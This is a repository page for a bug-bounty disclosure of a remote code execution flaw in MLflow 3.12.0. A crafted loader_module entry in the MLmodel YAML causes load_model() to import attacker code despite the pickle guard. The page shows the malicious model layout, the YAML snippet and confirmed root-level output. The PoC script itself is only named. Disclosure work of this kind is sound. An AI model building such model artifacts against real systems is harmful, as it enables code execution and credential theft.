You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

MLflow F002 loader_module Guard Bypass RCE

Payload repository for Huntr / ProtectAI triage.

Finding

RCE: Unvalidated loader_module in MLmodel YAML bypasses MLFLOW_ALLOW_PICKLE_DESERIALIZATION in mlflow.pyfunc.load_model().

Primary PoC

proof_f002.py

Vulnerable Model Structure

The PoC creates a malicious MLflow model artifact with this structure:

evil_model/
  MLmodel
  code/
    evil_loader.py

The attacker-controlled MLmodel contains:

flavors:
  python_function:
    loader_module: evil_loader
    code: code

MLflow adds the model-controlled code/ directory to sys.path, then imports the attacker-controlled loader_module.

Confirmed Behavior

The exploit was confirmed on MLflow 3.12.0.

The proof explicitly sets:

MLFLOW_ALLOW_PICKLE_DESERIALIZATION=False

Confirmed output includes:

UNIQUE_MARKER_F002_LOADER_MODULE_RCE
load_model_return_type: <class 'mlflow.pyfunc.PyFuncModel'>
marker_exists_after: True
marker_content: uid=0(root) gid=0(root) groups=0(root)
F002_CONFIRMED: loader_module imported attacker code while pickle guard was disabled

This confirms attacker-controlled Python code executed during mlflow.pyfunc.load_model() even though pickle deserialization was disabled.

Why This Is Not a Pickle Claim

This PoC does not require a malicious pickle payload.

The root cause is dynamic import of attacker-controlled module metadata:

python_function.loader_module

from attacker-controlled MLmodel YAML after MLflow prepends attacker-controlled model code to Python's import path.

Key Evidence Files
proof_f002.py
RAW/proof_f002_stdout.txt
RAW/proof_f002_stderr.txt
RAW/proof_f002_exit_code.txt
SRC/source_references_f002.txt
SOURCE_REFERENCES.md
ENVIRONMENT.txt
COMMANDS.md
REQUESTS_RESPONSES.md
SHA256SUMS.txt
Scope

Confirmed against:

Repository: mlflow/mlflow
Version: MLflow 3.12.0
Component: mlflow.pyfunc.load_model()
Affected path: Python Function flavor loader dispatch
Security control bypassed: MLFLOW_ALLOW_PICKLE_DESERIALIZATION=False
Impact

An attacker who can cause a target to load an attacker-controlled MLflow model artifact can execute arbitrary Python code in the MLflow process context.

Potential impact includes:

environment variable theft
cloud credential theft
model artifact theft or tampering
CI/CD compromise
lateral movement from model validation or serving infrastructure

This repository intentionally contains only MLflow F002 loader_module guard-bypass RCE artifacts.
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support